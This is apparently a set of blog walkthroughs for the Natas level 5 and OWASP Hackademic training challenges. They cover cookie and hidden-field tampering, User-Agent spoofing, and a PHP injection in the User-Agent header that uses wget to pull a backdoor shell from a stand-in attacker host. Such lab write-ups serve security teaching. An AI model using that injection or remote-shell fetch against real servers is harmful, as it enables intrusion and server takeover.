OverTheWire: Natas Level 5 – #appsec #webapp #websecurity #wargames

Another day, another challenge…

In today’s blog post, we’re going to solve level 5 from the Natas wargame challenge.

Let’s begin.

Going to the following link and entering username of “natas5” and password of “iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq” we see the following:


After pressing “OK” we see:


Hmm… we see that we’re not logged in and access is disallowed.

Using Tamper Data, let’s see if the request headers show us a way to bypass the login feature.

Opening the Tamper Data application and refreshing the website we see:


Hmm… we see inside the Cookie that there is a loggedin that is currently set to zero. What if we change it to 1?

Changing the loggedin feature to 1 and pressing Enter we see:



We received the flag!

OWASP Hackademic Challenge 9

Another day, another challenge.

Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.

Below is the scenario:

A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.

Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.

Hint: A specially-tailored backdoor shell can be found at “http://www.really_nasty_hacker.com/shell.txt“.

Below is the solution

Clicking the first link we are presented with the following screen:


Doing a right click, view page source we get the following:


We noticed there’s a hidden field with the value of answer.php, with a name of page. Hmm… let’s see if we can access this page.

Putting the following address in the URL bar it seems we cannot access the file.


From the description we know that we need to upload a file from http://www.really_nasty_hacker.com/shell.txt

We know that our page is using php. Let’s see if we can modify the User-Agent using php syntax.

Opening Tamper Data after we enter the comment we’re presented with the following:


Changing the User-Agent to:

<?system(“wget http://www.really_nasty_hacker.com/shell.txt&#8221;);?>

Pressing “OK” we get the following:


Our script was uploaded successfully!

Going to the new site we see the following:


Hmm… We’re presented with a command line similar to challenge 8!

Let’s do a ls to see what we have on the file system.


Well we see that there is a file named “sUpErDuPErL33T.txt”

Let’s see what’s in this file.


We’re presented with login information.

Looking back at the command file we see the following file adminpanel.php

Going to that file we see the following:


An admin portal!

Let’s enter our login information and see what we get:



We passed the challenge!!!

Lessons learned:

We did our right click view page source which showed that we had a hidden file named answer.php. Trying to access this file didn’t help us. Next changing the user agent we were able to upload our file to the file system. Going to the file on the file system we noticed that the file allows us to execute commands. Executing the commands were able to find the login information and login successfully.

Use the knowledge you’ve learned to solve the next challenge. We were first introduced to user-agents in challenge #5 with the p0wnbrowser product. We know that we can change the user-agent to show content that we would’ve never noticed.

OWASP Hackademic Challenge 10

Another day, another challenge…

Today’s challenge will conclude the Hackademic Challenge.

Below is the scenario:

Would you like to become an active hacker ?
How about becoming a member of the world’s largest hacker group:
The n1nJ4.n4x0rZ.CreW!

Before you can join though, you ‘ll have to prove yourself worthy by passing the test that can be found at: http://n1nj4h4x0rzcr3w.com

If you succeed in completing the challenge, you will get a serial number, which you will use for obtaining the password that will enable you to join the group.

Your objective is to bypass the authentication mechanism, find the serial number and be supplied with your own username and password from the admin team of the site.

Clicking the link we see the following screen:


Doing a right click, page source we see the following:


Looking at the line above the password line we noticed that there is a hidden field called “LetMeIn” which is set to false. What if we set this to true?

Going back to the our original screen, and clicking on Tools –> Web Developer Extension –> Forms –> Display Form Fields we see the following screen:


Changing the field from “False” to “True” and pressing the “Login” button we see the following:


Hmm… there’s an alert box that has encoding in it. Could this encoding contain the serial number?

Copying the encoding and going to Google we search for “Decoder online”. We found a website HERE

Changing the encoding type from Base64 to URL encoding and pressing “Decode” we see the following:


We have the serial number!

Going back to the challenge and pressing Enter we’re presented with the following screen:


Entering our name and serial number, and pressing the send button we see the following screen:


Lesson learned:

Our trick of right clicking and viewing the page source helped us. We noticed that there is a hidden field titled, “LetMeIn”. Developers believe that just because a field is hidden a penetration tester could not exploit these fields. This is further from the truth.

After we have tampered with the hidden field we are next encountered with encoding. Doing a quick Google search we found an encoder/decoder online that we can use to decode the encoding.

Once that decoding is done we entered our name and serial number on the next screen and we have completed the challenge.

OWASP Hackademic Challenge 7

Another day, another challenge.

This post we will solve challenge 7 of the OWASP Hackademic Challenge.

Below is the scenario:

A good friend of mine studies at Acme University, in the Computer Science and Telecomms Department. Unfortunately, her grades are not that good. You are now thinking “This is big news!”… Hmmm, maybe not. What is big news, however, is this: The network administrator asked for 3,000 euros to change her marks into A’s. This is obviously a case of administrative authority abuse. Hence… a good chance for D-phase and public exposure…
I need to get into the site as admin and upload an index.htm file in the web-root directory, that will present all required evidence for the University’s latest “re-marking” practices!
I only need you to find the admin password for me…

Good Luck!

Clicking on the link we see the following:


Right clicking on the page we see the following:


We see that there is a folder named index_files. Let’s go this folder and see what’s there…


Well look what we have here… there’s a lastlogin.txt, clicking on that file we get the following:


We see that Irene is a valid user. Let’s go back to the beginning and add Irene to the text box (with TamperData on) and see what we get.



Let’s press “OK”, and continue.


Reloading the page we now see the following in TamperData:


Well what do we have here? Inside the cookie we have the user of Irene and a userlevel of “user”. Lets try to change the userlevel to admin and see if this will solve our challenge.


After pressing out we get the following screen:


Lessons learned:

Page source provided gems in this challenge. When doing the page source we noticed that there was a folder “index_files”. When accessing this folder we see that there was information that was disclosed incorrectly that showed the last login of the application. This is bad because another user (in this case us) can impersonate a valid user.

Once we checked the grade for our user of “Irene” and looked at the tamper data results we noticed there was a cookie header that showed that our user had a privilege level of user. We noticed that this value can be changed. After change the privilege from user to admin we completed the challenge successfully.

When creating an application make sure that information is not being disclosed improperly. Make sure that there are no open folders that can be accessed on the website.

OWASP Hackademic Challenge 5

Another day, another challenge…

What’s the challenge today? Challenge 5 of 10 from OWASP Hackademic.

Scenario below:

You need to get access to the contents of this SITE. In order to achieve this, however, you must buy the “p0wnBrowser” web browser. Since it is too expensive, you will have to “fool” the system in some way, so that it let you read the site’s contents.

Walk through below:

Going to the website we get the following:


Viewing page source we see the following:


So… the page source is not helping us as there are no gems.

Let’s look at Tamper Data.
Reloading the page and press “Tamper” we get the following:


We don’t have any POST data to change, but we do have request headers that we can change. One field looks interesting User-Agent.

The user-agent describes the type of browser that you are using. More can be learned about user-agent HERE.

If we change the user-agent to p0wnBrowser (since we are trying to trick the user to view the contents). Changing the user-agent we get the following:



Lesson learned:

In this case we did not have POST data (response) to change, but we did have GET data (request) to change. Looking at the different headers the user-agent jumps out as one to change. Once again, if you’re stuck, Google is the way to go!